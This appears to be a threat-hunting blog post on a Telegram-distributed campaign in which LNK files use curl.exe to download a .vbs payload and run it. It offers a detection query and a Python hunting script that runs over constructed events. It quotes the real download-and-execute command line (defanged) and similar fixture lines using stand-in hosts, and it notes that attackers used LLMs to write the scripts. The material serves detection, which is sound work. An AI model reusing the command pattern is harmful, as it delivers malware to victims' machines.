168. Adversaries Abuse LLMs to Generate Malicious Scripts
Hello everyone!
I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center.
The threat actors used Telegram to distribute archives with malicious LNK files. These files abuse curl.exe, which ships with Windows 10 (1803 and later) and Windows 11, so it is always available on the victim's host, to download a malicious .vbs file from a remote server and run it, for example:
C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"
Here we have a nice hunting opportunity:
event_type: "processcreatewin"
AND
proc_file_name: "curl.exe"
AND
cmdline: "vbs"
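To show what that hunt looks like when it runs over actual telemetry, here is an added example (my code, not from the original post or from Qianxin) that applies the same three conditions to a handful of constructed process-creation events and pulls the download URL and the local output path out of each hit. The event schema and field names (event_type, proc_file_name, cmdline) are assumed to match the query above; the events themselves are made up, except that the curl command line is the one from the campaign. One refinement over the literal query: it looks for ".vbs" as a file extension rather than for the bare substring "vbs", which would also match hostnames and words like "vbscript".

```python
"""Hunt: curl.exe on Windows downloading a .vbs file, run over constructed process-creation events."""
import re

# Constructed sample telemetry (not real logs). Field names mirror the hunting query in the post.
SAMPLE_EVENTS = [
    # parent cmd.exe launched by the LNK; the query keys on the child curl.exe, not on this event
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": 'C:\\Windows\\System32\\cmd.exe /c "curl -o C:\\Users\\Public\\aa.vbs '
                'https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs '
                '&& start C:\\Users\\Public\\aa.vbs"'},
    # the child curl.exe event: this is what the query in the post catches
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": 'curl -o C:\\Users\\Public\\aa.vbs '
                'https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs'},
    # same technique with different casing, the long option and a quoted path: must still be caught
    {"event_type": "processcreatewin", "proc_file_name": "CURL.EXE",
     "cmdline": 'CURL.EXE --output "C:\\Users\\Public\\Update Check.VBS" https://cdn.example[.]invalid/u.VBS'},
    # benign: curl fetching JSON from a host whose name merely contains "vbs"
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl -s https://vbs-metrics.example[.]invalid/api/health.json"},
    # benign: a .vbs being run, but not by curl
    {"event_type": "processcreatewin", "proc_file_name": "cscript.exe",
     "cmdline": "cscript.exe //nologo C:\\Scripts\\inventory.vbs"},
    # wrong event type: same command line, but not a process-creation event
    {"event_type": "filecreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl -o C:\\Users\\Public\\aa.vbs https://example[.]invalid/a.vbs"},
]

# ".vbs" as a file extension (followed by whitespace, a quote, or end of line), any casing
VBS_RE = re.compile(r"\.vbs(?=[\s\"']|$)", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# curl's output option; case-sensitive on purpose, since -O (remote name) is a different option
OUT_RE = re.compile(r"(?:-o|--output)\s+(?:\"([^\"]+)\"|(\S+))")


def matches_hunt(event):
    """The three conditions from the post: Windows process creation, image curl.exe, .vbs on the command line."""
    return (event.get("event_type") == "processcreatewin"
            and event.get("proc_file_name", "").lower() == "curl.exe"
            and VBS_RE.search(event.get("cmdline", "")) is not None)


def enrich(event):
    """Extract the remote URL and the local output path from a matching command line."""
    cmd = event["cmdline"]
    url = URL_RE.search(cmd)
    out = OUT_RE.search(cmd)
    return {
        "proc": event["proc_file_name"],
        "url": url.group(0) if url else None,
        "output": (out.group(1) or out.group(2)) if out else None,
    }


def hunt(events):
    """Run the hunt over a list of events and return enriched hits."""
    return [enrich(e) for e in events if matches_hunt(e)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Running this flags only the two curl.exe events that write a .vbs file, and leaves the parent cmd.exe, the benign curl call, the cscript.exe run and the file-creation event alone. In a real environment the hit rate should be near zero, since curl.exe writing script files to a world-writable location like C:\Users\Public is not something legitimate software does; the parent cmd.exe command line (the `&& start` of the dropped file) is worth pulling into the same alert for context.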
And if we look inside the downloaded .vbs file, it looks very much like the scripts that LLMs produce! That's it!
See you tomorrow!